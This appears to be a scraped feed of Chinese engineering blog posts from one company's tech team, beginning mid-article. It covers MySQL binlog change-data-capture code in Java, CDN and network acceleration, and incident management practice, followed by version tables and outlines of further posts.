mysql-binlog-connector-java库可以连接到MySQL服务器并订阅binlog事件，监听和解析MySQL的二进制日志（binlog）。  

public void tst() throws InterruptedException, IOException {  
    // 连接mysql
    BinaryLogClient client = new BinaryLogClient("127.0.0.1", 3306,
            "root", "password");
    // 设置偏移信息
    client.setBinlogFilename("mysql-bin.062888");
    client.setBinlogPosition(6080);

    client.registerEventListener(event -> {
        System.out.println(JSON.toJSONString(event));
        EventData data = event.getData();
        if (data instanceof WriteRowsEventData) {
            WriteRowsEventData writeRowsEventData = (WriteRowsEventData) data;
            System.out.println("Insert operation: " + JSON.toJSONString(writeRowsEventData.getRows()));
            // TODO: 处理插入操作
        } else if (data instanceof UpdateRowsEventData) {
            UpdateRowsEventData updateRowsEventData = (UpdateRowsEventData) data;
            System.out.println("Update operation: " + JSON.toJSONString(updateRowsEventData.getRows()));

            // TODO: 处理更新操作
        } else if (data instanceof DeleteRowsEventData) {
            DeleteRowsEventData deleteRowsEventData = (DeleteRowsEventData) data;
            System.out.println("Delete operation: " + JSON.toJSONString(deleteRowsEventData.getRows()));
            // TODO: 处理删除操作
        } else if (event.getHeader().getEventType() == EventType.TABLE_MAP) {
            // 处理表信息
            TableMapEventData eventData = event.getData();
            System.out.println("Database name: " + eventData.getDatabase());
            System.out.println("Table name: " + eventData.getTable());
        }
        long binlogPosition = client.getBinlogPosition();
        System.out.println(client.getBinlogFilename());
        System.out.println(binlogPosition);
    });

    client.connect();

}


注意点 


对同一数据库监听时，尽量指定serverId，一个serverId同一时间只能有一个客户端监听；
无法单独订阅某一个库、某一个表和某一个事件，需要在handle处理中自行过滤；
单独的事件中不包含语句所执行的库和表信息，只有一个tableId，需要监听TABLE_MAP事件，缓存tableId和具体表的映射，在具体的执行语句中通过此映射找到具体的表信息；
mysql对binlog有定期清理策略，需要注意binlog的缓存时间，避免重启时无法找到对应的binlog文件；
对于偏移的处理，除了业务关心的数据变更事件以外，其余的事件也需要及时的更新偏移信息，避免重启后读取的数据量过大。
注意mysql用户权限CREATE USER 'userxxx'@'%' IDENTIFIED BY 'Qwe123!!!';
GRANT SELECT, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON . TO 'userxxx' IDENTIFIED BY 'Qwe123!!!'; 

FLUSH PRIVILEGES;


三、suishen-cdc核心实现

CdcDataDeque 事件本地缓存队列

这是一个线程安全的单向链表，提供的添加节点、查询头节点及重置头节点方法。

OffsetStorage 偏移量存储器

用户保存和读取数据库的偏移信息，默认提供了基于redis保存的RedisOffsetStorage存储器

DataProcessor 事件处理器

默认提供了基于suishen-queue消息队列的SuishenQueueDataProcessor实现。

当使用queue消息队列的SuishenQueueDataProcessor时，可以通过实现CdcDataOperator完成对具体的队列事件消费，默认提供了WeryaiCdcDataOperator向weryAi服务同步。

AbstractSynchronizer 数据库同步器


继承Runnalbe接口，用于启动具体的监听任务；
继承DisposableBean接口，用户停止监听任务；
通过定时任务，指定时间内批量处理事件。
当前提供了mongo同步的MongoSynchronizer同步器和mysql同步的MysqlSynchronizer同步器实现


public abstract class AbstractSynchronizer implements Runnable, DisposableBean {  
    // 本地缓存队列
    private final CdcDataDeque queue = new CdcDataDeque<>();
    // 偏移量存储器
    protected final OffsetStorage offsetStorage;
    // 事件处理器
    protected final DataProcessor dataProcessor;

    protected AbstractSynchronizer(OffsetStorage offsetStorage, DataProcessor dataProcessor) {
        this.offsetStorage = offsetStorage;
        this.dataProcessor = dataProcessor;
    }

    protected void handler(CdcData data) {
        log.info("cdc AbstractSynchronizer:{}", JSON.toJSONString(data));
        queue.put(data);
    }

    protected void handler(String offset) {
        if (StringUtils.isEmpty(offset)) {
            return;
        }
        log.info("cdc AbstractSynchronizer offset:{}", offset);
        queue.put(new CdcData().setOffset(offset));
    }

    /**
     * 定时任务，每5s消费一次
     */
    @PostConstruct
    public void consume() {
        ThreadPoolTaskScheduler scheduledThreadPoolExecutor = new ThreadPoolTaskScheduler();
        scheduledThreadPoolExecutor.setPoolSize(2);
        scheduledThreadPoolExecutor.initialize();

        scheduledThreadPoolExecutor.execute(this);
        scheduledThreadPoolExecutor.scheduleWithFixedDelay(() -> {
            CdcDataDeque.Node first = queue.get();
            if (first == null) {
                return;
            }
            String offset;
            List list = Lists.newArrayList(first.getItem());
            while (true) {
                CdcDataDeque.Node next = first.getNext();
                if (Objects.isNull(next)) {
                    break;
                }
                CdcData item = next.getItem();
                if (StringUtils.isNotEmpty(item.getId())) {
                    list.add(item);
                }
                offset = item.getOffset();
                // 限制一次性处理数据量
                if (list.size() >= 90) {
                    // 发送数据
                    dataProcessor.handle(list);
                    // 保存偏移
                    offsetStorage.setOffset(offset);
                    // 重置头节点
                    queue.resetFirst(next);
                    list = Lists.newArrayList();
                }
                first = next;
            }
            if (CollectionUtils.isNotEmpty(list)) {
                // 发送数据
                dataProcessor.handle(list);
            }
            // 保存偏移
            offsetStorage.setOffset(first.getItem().getOffset());
            // 重置头节点
            queue.resetFirst(first);
            // 释放对象
            list = null;
            first = null;
        }, 5000);
    }
}


作者介绍


郑亚腾 资深服务端开发工程师



网站加速之网络加速
微鲤技术团队 — Mon, 08 Apr 2024 10:55:14 GMT
背景

 

如上图，互联网企业的国内业务肯定部署在国内，出海业务则一般部署在海外；具体部署区域，则一般根据用户所在区域，选择就近的区域。  

源站部署到不同区域，选择不同的机房，对于各地用户来说，会带来网络距离及网络线路质量的差异，从而对用户的访问响应时间也会产生一定差异。  

网络距离长及网络线路质量差，则会给用户带来比较差的体验，具体情况概括如下：   


用户访问国内源站遇到的情况：
内容分类：
静态内容访问慢，因为静态内容相对动态api接口请求的响应大小，一般大很多；
静态内容包括：静态网页（html、css、js、图片）、大文件、点播；
动态接口请求响应慢
原因：
用户到源站网络距离远；
用户到源站网络线路质量差；
用户访问静态内容大，本身需要时间；
源站负载大：因为源站带宽、源站硬件资源等受限
用户访问国外源站遇到的情况，同用户访问国内源站遇到的情况外，还有其他特殊场景：
区域跨度更大；
网络距离更远；
网络线路质量更差，不同区域访问还有可能有访问限制。  


那么，下文介绍的就是我们常见的网络加速方法，主要包括以下几类：


静态加速
动态加速DCDN（Dynamic Route for Content Delivery Network）
全站加速(Whole Site Acceleration)
全球加速（Global accelerator）  


ps：因为是要介绍的技术是通用技术，各家公有云都有自己的产品，所以在下文的介绍中，我为了避免重复的画图及描述，引用了各家公有云的文档，在下文中有对应标示。

静态加速

静态加速，我们听过最多的就是CDN，而且一般用的是CDN的静态文件缓存加速功能。 

CDN加速的核心就是就近访问缓存：


让用户就近访问到性能最佳的边缘加速节点；
相对于源站，边缘节点是部署在不同区域，离用户更近的镜像节点，可以缓存源站内容供用户访问。  


CDN的加速原理（引用阿里云官网文档）：  


如图：
请求过程：
当终端用户向www.aliyundoc.com下的指定资源发起请求时，首先向Local DNS（本地DNS）发起请求域名www.aliyundoc.com对应的IP。
Local DNS检查缓存中是否有www.aliyundoc.com的IP地址记录。如果有，则直接返回给终端用户；如果没有，则向网站授权DNS请求域名www.aliyundoc.com的解析记录。
当网站授权DNS解析www.aliyundoc.com后，返回域名的CNAME www.aliyundoc.com.example.com。
Local DNS向阿里云CDN的DNS调度系统请求域名www.aliyundoc.com.example.com的解析记录，阿里云CDN的DNS调度系统将为其分配最佳节点IP地址。
Local DNS获取阿里云CDN的DNS调度系统返回的最佳节点IP地址。
Local DNS将最佳节点IP地址返回给用户，用户获取到最佳节点IP地址。
用户向最佳节点IP地址发起对该资源的访问请求。
返回用户所需数据：
如果该最佳节点已缓存该资源，则会将请求的资源直接返回给用户（步骤8），此时请求结束。
如果该最佳节点未缓存该资源或者缓存的资源已经失效，则节点将会向源站发起对该资源的请求。获取源站资源后结合用户自定义配置的缓存策略，将资源缓存到CDN节点并返回给用户（步骤8），此时请求结束。  


阿里云CDN产品架构图，其他公有云产品架构图差不多。



链路质量系统

链路质量探测系统会实时监测缓存系统中的所有节点和链路的实时负载以及健康状况，并将结果反馈给调度系统，调度系统根据用户请求中携带的IP地址解析用户的运营商和区域归属，然后综合链路质量信息为用户分配一个最佳接入节点。
调度系统

支持策略中心、DNS、HTTPDNS和302调度模式。当终端用户发起访问请求时，用户的访问请求会先进行域名DNS解析，然后通过阿里云CDN的调度系统处理用户的解析请求。
缓存系统

用户通过收到的最佳接入节点访问对应的缓存节点，如果节点已经缓存了用户请求的资源，会直接将资源返回给用户；如果L1（边缘节点）和L2（汇聚节点）节点都没有缓存用户请求的资源，此时会返回源站去获取资源并缓存到缓存系统，供后续用户访问，避免重复回源。分级缓存的部署架构可提高内容分发效率、降低回源带宽以及提升用户体验。
支撑服务系统

支撑服务系统包括天眼、数据智能和配置管理系统，分别具备了资源监测、数据分析和配置管理能力。
资源监测：天眼可以对缓存系统上用户业务运行的状态进行监测。例如对CDN加速域名的QPS、带宽、HTTP状态码等常见指标的监控。
数据分析：用户可以分析CDN加速域名的TOP URL、PV、UV等数据。
配置管理：通过配置管理系统，用户可以配置缓存文件类型、缓存时去参数缓存等缓存规则，以提升缓存系统的运作效率。


节点分布（引用华为云官网文档）


华为云国内节点：    
华为云国外节点：  


cdn加速类型（引用华为云官网文档）


网页加速 

网站的html、js、css、图片等静态资源加速。

大文件下载加速
APP更新，手游更新等，传统的下载网站类业务。

点播加速
在线教育类网站、在线视频分享网站、互联网电视点播平台、音乐视频点播APP的音视频点播服务，会涉及音视频转码。
  


动态加速DCDN（Dynamic Route for Content Delivery Network）

web1.0时代，网站大部分是静态内容，所以最开始的静态加速就能满足需求；随着web2.0及移动互联网时代的到来，网站中的动态请求占比逐渐提升。 

那如果动态内容请求慢，是否有加速的办法了？答案是有的，那就是动态加速。 

如下图，因为动态内容如果加了缓存，那么用户访问到的就不是最新的内容； 

所以动态请求一般不做缓存加速的方案，而是通过优化边缘节点到源站的回源链路的方式来加速； 

cdn静态缓存加速的边缘节点一般是通过公网线路回源到源站； 

动态加速网络会把动态加速网络中的所有边缘节点互联成一个私有网络； 

动态加速就是用户就近访问到边缘节点后，通过这个私有网络，智能选择一条最优质量的线路回源，保证回源过程不会受到公网网络的不确定因素的影响的方式来进行动态请求的加速；同时这个私有网络也会进行一些长链接等协议优化的方式来加速。 

ps：


动态加速并不能解决因为物理距离增加的响应时间变长的问题。
动态加速效果，需要业务自己实际对比测试，看满不满足业务需求。
图片来自阿里云



全站加速(Whole Site Acceleration)

全站加速，其实就是同时具备静态加速和动态加速的能力。 

CDN初代产品具有的能力就是静态加速，随着升级支持动态加速的功能，就变成了全站加速。 

不同的云厂商产品规划不同，有些云厂商会把全站加速单独拿出来作为一个产品，有些云厂商则把全站加速集成到了CDN产品中。 

全站加速的过程如下图：


用户发起的请求如果是静态请求，则会遵循CDN静态加速的流程，主要是通过缓存来加速；
用户发起的请求如果是动态请求，则会遵循动态加速的流程，主要是通过智能路由来加速。  


ps：不同云厂商的动态加速计费方式和静态加速计费方式可能不一样，需要注意计费方式不同带来的成本不同的问题。图片来自华为云： 

  

全球加速（Global accelerator）（引用aws官网文档）

全球加速核心和全站加速中的动态加速的原理类似，大概如下：


把分布在全球的边缘节点组成一个云厂商的私有网络；
用户会访问到就近的边缘节点；
边缘节点会通过私有网络回源到源站；
源站可以部署多个，部署到不同区域（region）；
回源可以根据策略回源到不同源站。
AnyCast IP可以绑定到不同区域的边缘节点。



应用场景（图片来自华为云）：


游戏业务 


跨国办公 




总结


怎么选择加速产品？ 

看业务需求：是要对静态文件加速，还是要对动态接口加速，或者对静态文件和动态接口都加速？
静态文件加速选择CDN静态加速即可；
动态api加速选择动态加速DCDN，同时一般会启用静态加速，即开启全站加速；
动态api加速当然也可以选择全球加速（Global accelerator）。
使用加速产品的注意事项： 

确认厂商的计费模式及价格；这个关系到我们的成本；
需要看厂商是自建CDN还是融合CDN？这个关系到厂商产品的性价比；
各家CDN厂商的节点分布情况以及是否能够提供节点清单？用来确认用户访问的节点是不是CDN厂商的节点？
确认使用加速产品前后的性能对比；可以使用RUM（真实用户http访问监控）数据做对比分析；
确认厂商对CDN边缘节点的健康检测及故障迁移能力；这个可能涉及到一种情况：我们的用户访问到了不能正常提供服务的CDN边缘节点，即用户此时不能正常访问；如果厂商不能快速检测到异常的CDN边缘节点并把流量切换到其他正常CDN边缘节点，就会影响我们业务的可用率；这种问题我们自己能否感知，取决于我们的RUM（真实用户http访问监控）的能力。
确认边缘节点的缓存策略；比如说http状态码404、502、503是否缓存？
确认边缘节点的回源策略；有些厂商的cdn静态加速是通过公网回源，有些厂商会通过厂商自己的私有优化的网络回源。
确认跨站请求配置、客户端ip透传配置；不同配置对业务有不同影响；
确认是否支持IP黑白名单功能；内部系统开启CDN加速，可能需要用到IP白名单来限制其他IP的访问；
确认是否部署CDN使用量实时监控；这个主要是避免异常的大流量或大带宽引起的异常费用；比如平常带宽1Gbps，突然涨到5Gbps甚至更大，那么费用也会对应增长。
选择什么加速产品以及选择哪家厂商可以根据自身业务的需求以及第2点中的注意事项（主要是各厂商的性价比）评估选择即可。


作者介绍


邹永红 高级SRE专家



故障管理三部曲
微鲤技术团队 — Thu, 29 Feb 2024 10:59:05 GMT
背景


在任何一个生产产品的行业，不管是互联网行业，还是建筑行业，或者是医疗行业，都得面对一个事物，那就是故障；
故障处理的好，那只是一个故障；故障处理的不好，就有可能升级成不同级别的事故；
出现事故，这是任何人都不想看见的；
如何避免事故，是安全生产的头等大事；
在这里，我会介绍我们公司的一些安全生产及故障管理的实践，大概分如下几部分：
故障前；
故障中；
故障后；
故障处理流程图；
事故管理制度；
可用率保障小组。


故障前


既然是故障前，说明故障还未发生，那故障前的关键工作包含以下几点：

隐患分析及修复；
故障预警；
预警响应。
隐患分析及修复

隐患分析目的：分析清楚自身系统的隐患，才能知道可能的风险以及如何应对；
隐患分析方法及工具：FMEA方法，排除架构可用性隐患的利器，引用自《从零开始学习架构》；
结合自身实际情况梳理隐患表，以下是我们结合实际情况，针对技术基础设施redis，输出的隐患分析demo。  



  - 隐患修复：
    - 目的：修复隐患，提高系统的可用性、可扩展性、可维护性；
    - 方法及工具：
      - 根据优先级安排修复任务排期；
      - 持续跟进任务进度，形成闭环。
  - 隐患分析并非一劳永逸，需要按周期持续迭代及优化。


故障预警

故障预警的核心工作是完善监控告警体系，这也是一个专题工作及实践；
这里提出2个问题及思考：
思考1:故障前,说明故障还未发生，但是为啥最终故障发生了（针对缓慢触发型告警）？
缓慢触发型告警：告警不是突发性触发的告警，告警对应指标的值是缓慢增长到告警阈值，触发的故障时可以避免的；
故障原因：
监控告警有没有配置：覆盖率是否100%？监控告警覆盖对象有没有被自动化添加到告警对象中？
监控告警覆盖维度是否全面？常见的维度（指标、日志、trace），需要整个业务研发团队一起完善，需要对自己负责的系统做好监控告警；
告警触发方式是否完善？阈值告警（count）、斜率告警（pdiff）等；
监控告警有无触发验证？配置了告警，但没有验证过，往往会失效；
故障处理是否闭环？星星之火，可以燎原，故障处理要像灭火一样处理干净。
优化措施：
完善监控告警体系。
思考2:完善了监控告警，就不会有故障了？
突发型触发告警：告警是突发性触发的告警，告警对应指标的值是一下子增长到告警阈值，触发的故障较难避免；
故障原因：
有变更：有发布或重启服务、有变更配置、外部依赖有变更、有服务被关闭或下线等；
有突发流量：有推广活动、受到外部或自身原因引起的DDOS攻击等；
优化措施：
不要轻视线上变更（有可能触发研发高压线及严重事故）；
完善操作sop及应急预案。
预警响应

预警响应有两个关键点：
告警方式能否有效通知到处理人？
故障处理是否及时？如果不及时处理，故障可能升级成事故；
告警方式怎么有效通知到处理人？
确保重要告警，使用电话告警，电话、短信、邮件的通知到人的有效性不一样，电话最高；
确保告警接受人能正常接收到告警（手机需要保持非静音、有电、有信号）；
确保告警有升级策略，避免因为一个人没响应，告警没有备份处理人处理的情况；
故障怎么能被及时处理？
处理故障处理流程，按SOP操作；
梳理故障应急预案，做好演练；
保障工具良好运行，避免一到处理故障，就出现各种异常情况（无网络、vpn失效、电脑死机、家用电脑和工作电脑环境不一致等）；
设定告警响应OKR，比如一个OKR周期内，0.3分标准为告警未及时响应次数《2（根据团队具体人数及情况而定）。


故障中


既然是故障中，说明故障已经发生，那故障中的关键工作包含以下几点：
故障信息同步：
找人、确认所有影响、服务恢复方案和预计恢复时间；
故障处理方案同步；
故障处理
止损、保留现场；
恢复服务；
故障恢复信息同步；
故障升级；


故障后


既然是故障后，说明故障已经修复，那故障后的关键工作包含以下几点：
故障报告
事故描述
事故解决方案
事故原因分析
事故影响
后续如何避免
事故收尾工作
问题是否切底解决
未解决，有解决方案：追踪和解决问题（建任务），形成闭环。
未解决，没有根治方案：完善预防监控措施。


故障处理流程图


根据以上的“故障前、故障中、故障后”总结出微鲤故障处理流程图，SOP如下图，具体情况，还需具体分析。

故障处理流程图中的关键角色：
报警人：反馈故障的人；
接警人：接到故障反馈的人；
指挥员：故障处理全局协调人；
快恢负责人：能够快速恢复故障，止损的人；
诊断负责人：诊断故障原因，给出解决方案的人。


事故管理制度


目的：出了故障后，我们需要上报故障，看故障是否升级为事故，并进行事故管理，所以需要建立对应的事故管理制度。
事故管理制度关键工作包含以下几点：
确定事故管理负责人：
跟进事故记录；
跟进事故定级和定责；
跟进事故处理和总结；
每月发送事故月报到部门负责人；
事故定级，根据对业务影响情况定级；
事故定责，根据需要改进的地方定责；
制定事故记录模板：
事故等级
事故时间以及发现人
事故现象
事故影响
事故解决方案
事故原因
后续改进
制定事故处理红线：出现事故后必须同步信息至业务负责人，为了避免扩大损失快速处理的同时，处理流程及事故信息需同步公开，不得私自修复后隐瞒；
制定研发高压线：需要定义清楚未经授权或确认，私自进行会触发事故的高危操作，根据企业具体情况制定。


可用率保障小组


目的：
从全方位提高每个业务的可用率；
基于微鲤事故管理机制，我们出了事故后，事故管理存在定责的环节，这中间可能存在定责不清的情况，为了优化这种情况，所以建立了可用率保障小组及机制。
机制
每个业务团队，组建一个可用率保障小组；
可用率保障小组成员由研发、测试、运维共同组成；
业务可用率由可用率保障小组部分或全部成员保障；
故障定责机制：
责任方无异议，遵循事故管理机制责任划分；
业务方需要对业务可用率做好监控告警，因业务方不清楚自己负责业务的可用率导致的故障由业务方负主责（目的：推进业务方关注自己的业务可用性）；
每个业务方需要对自己负责的业务系统的可用性、可用率负责；
如果有支撑方，业务方需要告知支撑方隐患点以及需要支撑方做什么来保障可用性；
业务方需要给出自己的承若及SLA；
需求方和支撑方都可以给对方提出高可用优化建议，如果技术委员会认定可执行但没有执行，引起的故障为未执行建议方主责；
引起故障的原因都不在双方的隐患分析里面，且故障定责有异议，则双方共同承担主责。


总结


以上是我们在故障管理方面的实践经验，主要就是故障管理三部曲以及其他一些实践，包括故障前、故障中、故障后、故障处理流程图、事故管理制度、可用率保障小组等方面实践；
我们可以根据我们具体情况，具体分析，持续优化故障管理，达到减少故障、避免故障、减少业务损失的目的。


作者介绍


邹永红 高级SRE专家

Spring Boot Version	JDK Version	来源
2.1	8 – 12	https://docs.spring.io/spring-boot/docs/2.1.x/reference/html/getting-started-system-requirements.html
2.2 – 2.3	8 – 15	https://docs.spring.io/spring-boot/docs/2.1.x/reference/html/getting-started-system-requirements.html
2.4	8 – 16	https://docs.spring.io/spring-boot/docs/2.4.x/reference/html/getting-started.html#getting-started-system-requirements
2.5	8 – 18	https://docs.spring.io/spring-boot/docs/2.5.x/reference/html/getting-started.html#getting-started.system-requirements
2.6	8 – 19	https://docs.spring.io/spring-boot/docs/2.6.x/reference/html/getting-started.html#getting-started.system-requirements
2.7	8 – 21	https://docs.spring.io/spring-boot/docs/2.7.x/reference/html/getting-started.html#getting-started.system-requirements
3.0	17 – 21	https://docs.spring.io/spring-boot/docs/3.0.x/reference/html/getting-started.html#getting-started.system-requirements
3.1	17 – 21	https://docs.spring.io/spring-boot/docs/3.1.x/reference/html/getting-started.html#getting-started.system-requirements
3.2	17 – 23	https://docs.spring.io/spring-boot/docs/3.2.x/reference/html/getting-started.html#getting-started.system-requirements

依赖	版本
org.springframework	5.3.31
spring-data-redis	2.7.18
spring-data-mongodb	3.4.18
commons-lang3	3.12.0
commons-collections	3.2.2
commons-collections4	4.4
jstl	1.2
guava	32.1.3-jre
jackson-mapper-asl	1.9.8
jackson-core	2.16.1
hibernate-validator	6.2.5.Final
javax.el	3.0.0
javax.validation	2.0.1.Final
javax.xml.bind	2.3.1
suishen.com.baidu.disconf	2.6.38-SNAPSHOT
org.reflections	0.9.11
lombok	1.18.30
org.jetbrains	24.0.1
suishen-libs	3.0.0-jdk21-SNAPSHOT
suishen-redis	3.0.0-jdk21-SNAPSHOT
suishen-webx-parent	3.0-jdk21-SNAPSHOT
suishen-webx-core	3.0-jdk21-SNAPSHOT
suishen-root-pom	3.0-jdk21-SNAPSHOT

Untitled RSS Feed

记一次线上 Full GC 排查：线程池 + ThreadLocal 引发的内存泄漏

1. 背景

GC 日志分析

为什么是老年代？

2. 堆转储分析：MAT 定位泄漏源

ThreadLocal 为什么容易泄漏？

3. 代码审查：找到写入点和"形同虚设"的清理逻辑

4. 根因分析：ThreadFactory 中的 r 到底是什么？

线程池的内部运作机制

5. 解决方案：使用 TaskDecorator

6. 延伸思考

6.1 ThreadFactory vs TaskDecorator：职责边界

6.3 排查内存泄漏的通用思路

7. 总结

作者介绍：

AWS S3 事件通知 + SQS 消息队列：Java 实现文件上传自动化处理的完整实战指南

目录

一、背景与需求分析

1.1 业务场景

1.2 技术挑战

二、架构设计与方案对比

2.1 方案一：应用层手动发布事件（传统方案）

缺点：

2.2 方案二：S3 事件通知 + SQS（推荐方案）

优点：

2.3 最终架构图

三、AWS 侧配置详解

3.1 创建 SQS 队列

3.2 配置 SQS 访问策略

3.3 配置 S3 事件通知

3.4 S3 事件通知消息格式

四、Java 代码实现详解

4.1 Maven 依赖配置

4.2 应用配置文件

4.3 条件化加载：SqsEnabledCondition

设计意图：

4.4 SQS 配置类：AwsSqsConfig

关键配置说明：

4.5 S3 事件消息模型：S3EventNotification

4.6 核心监听器：ThumbnailListener

@SqsListener 注解详解

删除策略选项：

4.7 事件模型：ThumbnailEvent

设计亮点：

4.8 异步处理器：ThumbnailEventHandler

五、生产环境关键设计

5.1 防循环触发：三层防护机制

5.2 并发控制：Semaphore 限流

为什么使用 Semaphore 而不是线程池大小控制？

并发数推荐：

5.3 消息删除策略与重试机制

代码中的策略选择：

5.4 消息处理的幂等性

六、监控、运维与故障排查

6.1 运行日志关键标记

6.2 AWS CloudWatch 监控指标

6.3 常见问题排查表

7.3 进阶优化建议

八、总结与最佳实践

核心架构回顾

最佳实践清单

扩展思路

作者介绍：

Swift 方法派发机制深度解析

前言

目录

什么是方法派发

Objective-C 的消息派发机制

OC 的核心：消息传递

消息派发的完整流程

详细步骤解析

1. 缓存查找（最快路径）

特点：

2. 方法列表查找

3. 父类链查找

4. 消息转发机制

OC 消息派发的特点

优点：

1.极致的动态性